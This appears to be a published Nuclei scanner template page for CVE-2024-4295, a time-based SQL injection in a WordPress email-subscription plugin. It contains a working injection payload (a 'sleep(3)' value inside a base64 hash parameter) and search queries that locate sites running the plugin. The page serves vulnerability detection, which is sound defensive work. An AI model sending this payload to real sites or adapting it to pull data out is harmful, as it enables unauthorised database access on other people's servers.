Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash

ID: CVE-2024-4295

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli

Description

Email Subscribers by Icegram Express <= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.

YAML Source

id: CVE-2024-4295

info:
  name: Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Email Subscribers by Icegram Express <= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.
  remediation: Fixed in 5.7.21
  impact: This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve
    - https://github.com/cve-2024/CVE-2024-4295-Poc
    - https://github.com/truonghuuphuc/CVE-2024-4295-Poc
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4295
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-4295
    cwe-id: CWE-89
    epss-score: 0.00091
    epss-percentile: 0.39447
    cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: icegram
    product: email_subscribers_\&_newsletters
    framework: wordpress
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/email-subscribers/"
    fofa-query: body="/wp-content/plugins/email-subscribers/"
  tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli

variables:
  contact_id: "{{contact_id}}"
  email: "{{email}}"
  rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(3)"],"action":"subscribe"}'

http:
  - raw:
      - |
        @timeout: 20s
        GET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'contains(body, "You have been successfully subscribed")'
        condition: and
# digest: 4a0a00473045022100ef84d71b771f0dcbd197ffad01746ecd151e0b2003a65b67dcadb27ecd0a473902206ff2fe02e08e414a0195191853ce7d2b232dfacdeea953c89af0b715987fe263:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4295.yaml"

View on Github